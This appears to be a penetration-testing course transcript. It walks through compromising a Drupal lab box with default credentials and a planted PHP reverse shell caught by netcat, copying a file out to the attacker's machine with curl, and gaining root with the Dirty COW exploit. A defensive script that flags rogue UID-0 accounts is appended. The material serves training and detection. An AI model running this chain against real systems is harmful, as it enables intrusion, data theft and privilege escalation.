Welcome to the file transfer lab demo. You can see I'm on a Drupal site here. You can tell that because it says it's powered by Drupal and also because of the little Drupal logo here. So sometimes it's as easy as guessing. So I'm going to do admin/admin,
and you can see I logged in as admin. Hello admin.
So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content,
a basic page.
I'm going to call this shell.php
and I'm going to change this to PHP code.
Now I need to figure out what shell I want to use. Well obviously we know it's PHP. You can see this is that site I was telling you about, revshells.com.
I've already picked the pentestmonkey shell. I like this shell.
And what you do is I've just added my IP address and the port number.
It actually tells you what to do in your box here for the listener.
And I've changed my shell from the default /bin/sh to /bin/bash because I like bash shells better.
I'm gonna copy this. I'm going to paste it here.
So what I need to get ready is I need to get a listener ready.
nc -nlvp 4444.
And we'll save this;
we'll see if I hit preview.
Now I have my shell here: www-data. You can see this says no job control in this shell. So let's say I want to su root.
It says must be run from a terminal. So now we know we have what I call a bad shell.
How do we make this a nicer shell?
So I told you about python -c 'import pty'.
Let's do that.
But you can see this has /bin/sh.
I like bash better but I'll show you what happens if you do /bin/sh.
So you just get the little dollar sign and not the nicer output.
You can of course change this
to /bin/bash
and there you go. Now if I wanted to su root,
now it asks me for the password. Obviously I don't know the root user's password.
So typically I'll go and figure out
who is in here. And I see this drupalpro. Which users are in here, I should say. Remember cat
/etc/passwd.
And I see drupalpro.
So I'll change directory to drupalpro
and then I'll see what files are in here. And I see this something called secret.
Let's say I want to get that file onto my Kali box.
What I'll do is I'll split my terminal vertically.
And I'm gonna use that SimpleHTTPPutServer. I told you I'll show you what it looks like; cat it.
It's a very small script. But I can now put things onto my Kali box. Whereas if I just did SimpleHTTPServer, or http.server with python3, I can't put things onto my machine.
So let's do
python2
and it's on 8000.
So what I'll do on this side is curl -T, big T,
and then my Kali box, 192.168.1
And you can see that I got a PUT request here.
And if I check my desktop,
we can exit out of here. Now
I see that I get secret.
So I put that from the Drupal machine onto my machine with that server.
Now what I can do
is I can try to put a file from Kali onto this machine, and if I do uname -a, I see a kernel version and we'll talk about this more in kernel exploits,
but I know that this is vulnerable to Dirty COW,
as you can see I already have Dirty COW down here.
So typically what I do is go to the tmp directory because I know it's globally readable, writable and executable
and I'll use curl http://192.168.1.228:8000.
Remember this is on the desktop and Dirty COW is on the desktop. dirty
cow.c.
You can name it whatever I want: dirty.c,
and now I see the GET request on the right
and I see that that was downloaded.
So if I open this, I said I like to look at the comments.
It should tell me how to compile it. So I see here gcc -pthread dirty.c -o dirty.
So I'll try that here
and chmod +x,
and then I will
and a new password,
and you can see it should have overwritten
the /etc/passwd file to have this firefart user
in it as the root user.
So sometimes you'll notice that you may not get an output with these kernel exploits. There we go. Now we see something.
Great. So now we see that it's done. Check /etc/passwd to see if the new user was created.
So now I can do su firefart,
and my password of fire,
and now we see I am the root user.
So that gives you some idea of how I both get files. I mean I showed you many examples; that was just one, setting up that SimpleHTTPPutServer. But you saw how I could put files onto my machine.
You saw how I transferred from a bad shell where I couldn't use su
to using python and importing pty,
and then curling and getting the exploit onto the victim machine and ultimately being able to execute it and becoming the root user, which we'll talk about a lot more in the next module for privilege escalation. So I will see you for that.
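The demo ends by checking /etc/passwd by hand for the extra root user. As an added example, not part of the transcript or of the course material, here is a small Python audit that does that check automatically from the defender's side: it parses passwd-format lines and flags any UID 0 account other than root, plus any entry carrying a password hash directly in passwd rather than in /etc/shadow, which is the shape the new user in the demo takes. The sample lines, including the firefart entry and its hash, are constructed for the example; the function names are mine, not from any tool the demo uses.

```python
# Added example for the transcript above, not part of the original demo.
# Audits /etc/passwd-format text for the artefact the demo checks by hand:
# an extra UID-0 account, and a hash written straight into passwd.
# SAMPLE_PASSWD is constructed; the "firefart" line and hash are illustrative.
from dataclasses import dataclass
from typing import List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
drupalpro:x:1000:1000:Drupal Pro,,,:/home/drupalpro:/bin/bash
firefart:$6$constructedsalt$constructedhash:0:0:pwned:/root:/bin/bash
"""


@dataclass
class PasswdEntry:
    name: str
    password: str  # normally "x" (hash lives in /etc/shadow) or "*" / "!" (locked)
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd lines; raise on malformed records rather than skip them."""
    entries: List[PasswdEntry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(
                f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}"
            )
        name, password, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), home, shell))
    return entries


def find_rogue_root_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Names of UID-0 accounts other than root: any hit is a finding."""
    return [e.name for e in entries if e.uid == 0 and e.name != "root"]


def find_inline_password_hashes(entries: List[PasswdEntry]) -> List[str]:
    """Accounts whose hash sits in passwd itself instead of /etc/shadow."""
    return [e.name for e in entries if e.password not in ("x", "*", "!", "")]


def audit_passwd(text: str) -> List[str]:
    """Human-readable findings for one passwd file (empty list means clean)."""
    entries = parse_passwd(text)
    findings: List[str] = []
    for name in find_rogue_root_accounts(entries):
        findings.append(f"UID 0 account other than root: {name}")
    for e in entries:
        if e.password == "":
            findings.append(f"empty password field (no password required): {e.name}")
    for name in find_inline_password_hashes(entries):
        findings.append(f"password hash stored directly in passwd: {name}")
    return findings


if __name__ == "__main__":
    # Run against the constructed sample; on a real host, pass open("/etc/passwd").read().
    for finding in audit_passwd(SAMPLE_PASSWD) or ["no findings"]:
        print(finding)
```

On the constructed sample this reports two findings, both for firefart. The same check is cheap to run from a file-integrity job or a login-time hook, and it catches the outcome of the demo regardless of which exploit produced it.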